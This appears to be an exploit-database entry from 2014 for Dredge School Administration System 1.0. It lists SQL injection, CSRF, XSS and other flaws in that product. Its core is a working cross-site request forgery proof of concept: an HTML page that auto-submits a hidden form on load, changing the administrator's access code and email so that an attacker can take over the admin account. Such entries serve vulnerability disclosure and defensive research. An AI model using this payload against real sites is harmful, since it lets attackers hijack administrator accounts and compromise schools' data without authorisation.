Dredge School Administration System – ‘/DSM/loader.php’ Cross-Site Request Forgery (Admin Account Manipulation)

  • 作者: AtT4CKxT3rR0r1ST
    日期: 2014-01-07
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/38987/
  • source: https://www.securityfocus.com/bid/64720/info
    
    Dredge School Administration System is prone to the following security vulnerabilities:
    
    1. An SQL-injection vulnerability
    2. A cross-site request forgery vulnerability
    3. A cross-site scripting vulnerability
    4. An information-disclosure vulnerability
    5. A security-bypass vulnerability
    
    Exploiting these issues could allow an attacker to execute arbitrary script codes, steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, obtain sensitive information or bypass certain security restrictions to perform unauthorized actions.
    
    Dredge School Administration System 1.0 is vulnerable; other versions may also be affected. 
    
    [Change Password & Email Admin]
    
    <html>
    <body onload="document.form0.submit();">
    <form method="POST" name="form0" action="
    http://www.example.com/DSM/loader.php?load=account settings">
    <input type="hidden" name="AccessCode" value="123456" />
    <input type="hidden" name="ConfirmAccessCode" value="123456" />
    <input type="hidden" name="Email" value="email@hotmail.com" />
    <input type="hidden" name="MM_update" value="form2" />
    </form>
    </body>
    </html>